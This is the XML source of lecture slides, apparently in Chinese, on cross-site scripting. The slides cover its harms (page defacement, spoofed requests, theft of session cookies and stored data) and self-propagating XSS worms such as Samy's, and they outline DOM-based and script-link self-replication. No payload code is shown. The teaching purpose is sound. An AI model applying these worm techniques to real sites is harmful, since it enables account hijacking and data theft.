              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>如果上传的图像包括这段脚本会怎么样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="28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Shape 104"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Shape 105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>的危害</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Shape 106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1523999"/>
            <a:ext cx="8520600" cy="4388167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web defacing:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>访问宿主页面内的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>节点。 因此，注入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对页面进行任意更改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。 例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码可以将新闻文章页面更改为假的或更改页面上的某些图片</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofing requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码可以代表用户向服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealing information: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码还可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>窃取受害者的私人数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，包括会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，网页上显示的个人数据，以及由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>应用程序本地存储的数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16349327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prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>自我传播的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Shape 199"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317562" y="1447799"/>
            <a:ext cx="8679900" cy="3630533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的蠕虫，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的访问者不仅可以修改，他们的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>也可以携带</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码副本。 所以，当被感染的个人资料被其他人查看时，代码可以进一步传播。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>挑战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码如何自我复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>两种典型方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457197">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>直接从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获取自身的副本</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457197">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码可以通过使用脚本标记的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>属性的链接包含在网页中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14867199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Shape 203"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Shape 204"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>自我传播的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="205" name="Shape 205"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="629637" y="1905001"/>
            <a:ext cx="7884725" cy="3916776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14019798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Shape 209"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Shape 210"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>自我传播的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>蠕虫：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Shape 211"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1583005"/>
            <a:ext cx="8520600" cy="3671700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文档对象模型（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Document Object Model , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）方法：</a:t>
            </a:r>
